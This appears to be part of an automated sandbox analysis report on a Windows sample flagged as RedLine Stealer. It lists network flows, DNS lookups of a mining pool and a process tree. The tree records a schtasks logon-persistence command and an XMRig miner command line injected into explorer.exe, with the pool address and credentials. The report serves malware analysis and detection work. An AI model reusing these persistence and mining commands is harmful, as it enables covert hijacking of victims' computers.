Jan 14, 2022 14:10:32.186074972 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:32.186101913 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:32.186130047 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:32.233455896 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:35.538239956 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:35.641689062 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:35.654805899 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:35.745630026 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:35.764975071 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:35.842448950 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:35.890078068 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.255490065 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.343178988 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:36.390085936 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.397934914 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.482103109 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:36.483335018 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:36.494489908 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.577361107 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:36.624452114 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.687441111 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:36.771337986 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:36.771641970 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:36.812041044 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:37.849256039 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:37.941068888 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:37.984029055 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.003041029 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.098922968 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.100498915 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.195523977 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.213527918 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.310400963 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.314667940 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.412040949 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.417639017 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.506715059 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.508869886 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.588546991 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.640252113 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.685822010 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:38.763355970 CET  31334        49775      95.143.179.185  192.168.2.4
Jan 14, 2022 14:10:38.812166929 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:39.769198895 CET  49775        31334      192.168.2.4     95.143.179.185
Jan 14, 2022 14:10:39.848496914 CET  31334        49775      95.143.179.185  192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848567963 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848609924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848651886 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848706961 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848743916 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848903894 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848989010 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.849109888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849236012 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849315882 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.849493027 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849663973 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849746943 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927041054 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927073002 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927088022 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927182913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927268028 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927330017 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927339077 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927433968 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927505016 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927697897 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927826881 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927833080 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928020000 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928098917 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928174973 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928427935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928509951 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928670883 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928754091 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928910017 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929117918 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929435015 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929454088 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929722071 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929796934 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.929867983 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008032084 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008120060 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008166075 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008246899 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008256912 CET4977531334192.168.2.495.143.179.185

                                                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 14:11:24.046226978 CET | 192.168.2.4 | 8.8.8.8 | 0x6868 | Standard query (0) | mine.bmpool.org | A (IP address) | IN (0x0001)
Jan 14, 2022 14:11:35.964977026 CET | 192.168.2.4 | 8.8.8.8 | 0x728a | Standard query (0) | mine.bmpool.org | A (IP address) | IN (0x0001)

                                                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 14:11:24.071038961 CET | 8.8.8.8 | 192.168.2.4 | 0x6868 | No error (0) | mine.bmpool.org | (none) | 157.90.156.89 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:11:35.987705946 CET | 8.8.8.8 | 192.168.2.4 | 0x728a | No error (0) | mine.bmpool.org | (none) | 157.90.156.89 | A (IP address) | IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • 45.82.70.152:7777

                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  Behavior

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Start time:14:10:10
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:3609088 bytes
                                                                                                                                  MD5 hash:C7F9EFB09DB59923B3F96FD1EF2F0873
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:14:10:12
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Imagebase:0x1040000
                                                                                                                                  File size:98912 bytes
                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Start time:14:10:42
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\sistem.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\sistem.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:3514792 bytes
                                                                                                                                  MD5 hash:14A6FC2FF495BE7077B8AA7602606BB7
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
• Detection: 31%, Metadefender
                                                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:14:10:44
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Imagebase:0x1040000
                                                                                                                                  File size:98912 bytes
                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Start time:14:10:44
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
• Detection: 53%, Virustotal
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:14:10:47
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:50
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:51
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:51
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                  Imagebase:0x7ff6d4de0000
                                                                                                                                  File size:226816 bytes
                                                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:53
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 53%, Virustotal, Browse
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:14:10:53
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:54
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.821033223.0000020180001000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:54
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:55
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:14:10:56
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:14:10:58
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:31232 bytes
                                                                                                                                  MD5 hash:A5D983222C60F4DCAE743F8E34806580
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira

                                                                                                                                  General

                                                                                                                                  Start time:14:10:58
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "/sihost64
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                                  General

                                                                                                                                  Start time:14:10:59
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" cmd /c taskkill /f /PID "6040
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:14:11:00
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

General

Start time: 14:11:00
Start date: 14/01/2022
Path: C:\Windows\System32\taskkill.exe
Wow64 process (32bit): false
Commandline: taskkill /f /PID "6040"
Imagebase: 0x7ff747240000
File size: 94720 bytes
MD5 hash: 530C6A6CBA137EAA7021CEF9B234E8D4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 14:11:02
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.796871079.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.804927838.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
